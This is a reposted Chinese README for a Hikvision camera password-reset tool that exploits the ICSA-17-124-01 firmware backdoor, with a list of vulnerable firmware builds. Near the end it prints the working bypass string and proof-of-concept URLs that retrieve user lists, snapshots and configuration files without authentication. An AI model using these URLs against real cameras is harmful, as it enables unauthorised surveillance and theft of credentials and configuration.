海康威视网络摄像机后门
Hik密码助手
一种利用大约 2014-2016 年的海康威视相机固件 ( ICSA-17-124-01 ) 中的后门来帮助所有者更改忘记密码的工具。
用法
HikvisionPasswordResetHelper.exe从发布选项卡下载并运行 exe。
重置密码有 5 个简单的步骤,在很多情况下您甚至可以跳过第 3 步和第 4 步。
截屏
要求
.NET Framework 4.5.2 - 这包含在任何现代 Windows 安装中。
易受ICSA-17-124-01攻击的海康威视设备。
以下是据报道是否存在漏洞的相机固件的不完整列表。此列表是从各种来源编译的,相机型号未指定。 据报道,某些相机型号在不同的固件版本范围内易受攻击,因此我不会完全相信此列表对所有相机型号的准确性。
海康威视摄像头固件版本
- V5.1.6 内部版本 140412 - 无漏洞(至 ICSA-17-124-01)
+ V5.2.0 内部版本 140721 - 漏洞
+ V5.2.0 内部版本 141016 - 漏洞
+ V5.3.0 内部版本 150513 - 漏洞
+ V5.3.3 内部版本 150514 -易受攻击
+ V5.3.6 构建 151105 - 易受攻击
+ V5.3.8 构建 151224 - 易受攻击
+ V5.3.5 构建 161112 - 易受攻击
+ V5.4.0 构建 160401 - 易受攻击
+ V5.4.0 构建 160520 - 易受攻击
+ V5.4.1 构建 160525 - 易受攻击
+ V5.4.0 构建 160530 - 易受攻击
+ V5.4.3 构建 160705 - 易受攻击
+V5.4.3 构建 160808 - 易受攻击
+ V5.4.4 构建 161125 - 易受攻击
+ V5.3.9 构建 170109 - 易受攻击
- V5.4.3 构建 170123 - 非易受攻击
- V5.4.5 构建 170123 - 非易受攻击
- V5.4.3 构建 170217 - 非易受攻击 海康威视包含一个魔术字符串,允许即时访问任何摄像机,无论管理员密码是什么。只需将此字符串附加到海康威视相机命令:(?auth=YWRtaW46MTEK)
概念证明:
检索所有用户及其角色的列表:
- http://camera.ip/Security/users?auth=YWRtaW46MTEK
获取未经身份验证的相机快照:
- http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
下载相机配置:
- http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
本文系转载,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文系转载,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
评论
登录后参与评论
推荐阅读
腾讯云开发者
